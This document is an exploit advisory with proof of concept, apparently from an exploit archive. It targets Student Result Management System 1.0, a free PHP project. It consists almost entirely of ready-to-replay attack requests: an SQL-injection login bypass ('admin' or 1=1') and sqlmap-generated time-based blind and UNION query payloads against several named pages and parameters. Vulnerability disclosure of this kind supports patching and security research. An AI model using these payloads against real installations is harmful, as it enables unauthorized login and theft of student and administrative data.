# Exploit Title: Student Result Management System 1.0 - Multiple SQL
Injection Vulnerabilities
# Date: 2020-10-02
# Exploit Author: b1nary
# Vendor Homepage:
https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
# Software Link: https://github.com/projectworlds32/srms/archive/master.zip
# Version: 1.0
# Tested On: Linux + Apache2
# Description: Project Worlds Student Result Management System 1.0 is
subject to multiple SQL injection vulnerabilities due to improper input
sanitization.


=====================================================================================================

Authentication bypass:

POST /srms-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/login.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

userid=admin' or 1=1 -- -&password=password

=====================================================================================================

POST parameters: rno, class_name

POST /srms-master/add_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/add_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class_name=a*&rno=1*&p1=2&p2=3&p3=4&p4=5&p5=5


Sqlmap PoC:

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a&rno=1' AND (SELECT 8435 FROM
(SELECT(SLEEP(5)))bqQO) AND 'ubgm'='ubgm&p1=2&p2=3&p3=4&p4=5&p5=5

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a' AND (SELECT 9372 FROM (SELECT(SLEEP(5)))QJFS)
AND 'ciTV'='ciTV&rno=1&p1=2&p2=3&p3=4&p4=5&p5=5

=====================================================================================================

GET parameter: class

GET /srms-master/student.php?class=a*&rn=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Referer: http://localhost/srms-master/login.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1


Sqlmap PoC:

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:80/srms-master/student.php?class=a' AND
(SELECT 8178 FROM (SELECT(SLEEP(5)))eKNu) AND 'tPzY'='tPzY&rn=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: http://localhost:80/srms-master/student.php?class=a' UNION ALL
SELECT
NULL,CONCAT(0x71626b6b71,0x4c6d574642516a4d79436571774851464863774d676178767578515071537544534e784750445562,0x716b767871),NULL,NULL,NULL,NULL,NULL--
-&rn=1

=====================================================================================================

POST parameters: class_name, rno

POST /srms-master/manage_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/manage_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class_name=a*&rno=1*


Sqlmap PoC:

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a' AND (SELECT 6255 FROM (SELECT(SLEEP(5)))oVzX)
AND 'paEb'='paEb&rno=1

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class_name=a&rno=1' AND (SELECT 5940 FROM
(SELECT(SLEEP(5)))orHi) AND 'wdBr'='wdBr

=====================================================================================================

POST parameters: class, rn

POST /srms-master/manage_results.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/srms-master/manage_results.php
Cookie: PHPSESSID=t2hp6dv7shpbr42q99l7rag5t9
Upgrade-Insecure-Requests: 1

class=a*&rn=1*&p1=1&p2=2&p3=3&p4=4&p5=5


Sqlmap PoC:

Parameter: #2* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=a&rn=1' AND (SELECT 8305 FROM (SELECT(SLEEP(5)))Cldu)
AND 'oMCW'='oMCW&p1=1&p2=2&p3=3&p4=4&p5=5

Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=a' AND (SELECT 3606 FROM (SELECT(SLEEP(5)))HOqE) AND
'MgjX'='MgjX&rn=1&p1=1&p2=2&p3=3&p4=4&p5=5

=====================================================================================================